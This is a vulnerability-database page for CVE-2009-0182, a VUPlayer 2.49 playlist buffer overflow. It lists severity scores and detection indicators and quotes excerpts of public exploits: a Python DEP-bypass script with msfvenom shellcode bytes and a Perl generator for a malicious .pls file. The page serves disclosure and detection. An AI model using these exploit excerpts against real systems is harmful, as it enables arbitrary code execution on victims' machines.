CVE-2009-0182
published 2009-01-20CVE-2009-0182: Buffer overflow in VUPlayer 2.49 and earlier allows user-assisted attackers to execute arbitrary code via a long URL in a File line in a .pls file, as…
PriorityP353high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
48.40%
98.7th percentile
Buffer overflow in VUPlayer 2.49 and earlier allows user-assisted attackers to execute arbitrary code via a long URL in a File line in a .pls file, as demonstrated by an http URL on a File1 line.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vuplayer | vuplayer | <= 2.49 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect malicious .pls playlist files containing an abnormally long URL (>1012 bytes) on a File1= line, consistent with the buffer overflow trigger pattern. ↗
- →Detect VUPlayer opening .wax or .cue files with payloads exceeding 1012 bytes of junk before ROP chain — stack-based overflow in VUPlayer <= 2.49. ↗
- →Monitor for VUPlayer process loading BASS.dll and BASSMIDI.dll with ROP chain execution — these modules are used as no-ASLR gadget sources for DEP bypass. ↗
- →Flag .pls playlist files with a [playlist] header where File1= value contains an HTTP URL longer than typical media paths — exploit uses overflow after 'File1=http://'. ↗
- →Detect known bad characters \x00, \x0a, \x1a being avoided in shellcode — presence of shellcode in .wax/.pls/.cue files that avoids these bytes is a strong exploit indicator. ↗
- →Detect use of mona ROP chain generation targeting BASS.dll and BASSMIDI.dll with bad-char exclusions matching CVE-2009-0182 exploit tooling. ↗
- →This module exploits a stack-based overflow via a specially crafted .cue file in VUPlayer <= 2.49; monitor for VUPlayer process spawning child processes after opening .cue files. ↗
- ·The ROP gadget addresses (e.g., 0x10015f77, 0x1060e25c) are specific to the versions of BASS.dll and BASSMIDI.dll shipped with VUPlayer 2.49 on Windows 7 x64; they will not be reliable across different builds or OS versions. ↗
- ·The exploit was tested specifically on Windows 7 x64; DEP bypass via ROP chain may not apply to other Windows versions or configurations where ASLR is enforced on these DLLs. ↗
- ·The .pls exploit uses a 'Universal Address' approach (NOP sled + shellcode), suggesting the EIP overwrite offset may vary slightly by environment; the 1012-byte junk offset is specific to the .wax variant. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
exploitdb·2022-01-10·CVSS 8.8
CVE-2009-0182 [HIGH] VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
---
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
# Vendor Homepage: http://www.vuplayer.com/
# Software Link: [Null]
# Version: VUPlayer 2.49
# Tested on: Windows 7 x64
# CVE : CVE-2009-0182
# VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)
import struct
#shellcode
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python
buf = b""
buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"
buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"
buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\
Exploit-DB
VUPlayer 2.49 - '.pls' Universal Buffer Overflow
exploitdb·2009-01-07
CVE-2009-0182 VUPlayer 2.49 - '.pls' Universal Buffer Overflow
VUPlayer 2.49 - '.pls' Universal Buffer Overflow
---
#!/usr/bin/perl
# VUPlayer Universal Address
my $nopsled = "\x90" x 24;
open(my $pls_playlist, "> s.pls");
print $pls_playlist "[playlist]\r\n".
"NumberOfEntries=1\r\n".
"File1=http://".
$overflow.$eip.$nopsled.$shellcode.$overflow.
"\r\n";
close $pls_playlist;
# milw0rm.com [2009-01-07]
Metasploit
VUPlayer CUE Buffer Overflow
metasploit
VUPlayer CUE Buffer Overflow
VUPlayer CUE Buffer Overflow
This module exploits a stack based overflow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, a buffer is overwritten allowing for the execution of arbitrary code.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/165489/VUPlayer-2.49-Buffer-Overflow.htmlhttp://securityreason.com/securityalert/4923https://exchange.xforce.ibmcloud.com/vulnerabilities/48170https://www.exploit-db.com/exploits/7695http://packetstormsecurity.com/files/165489/VUPlayer-2.49-Buffer-Overflow.htmlhttp://securityreason.com/securityalert/4923https://exchange.xforce.ibmcloud.com/vulnerabilities/48170https://www.exploit-db.com/exploits/7695
2009-01-20
Published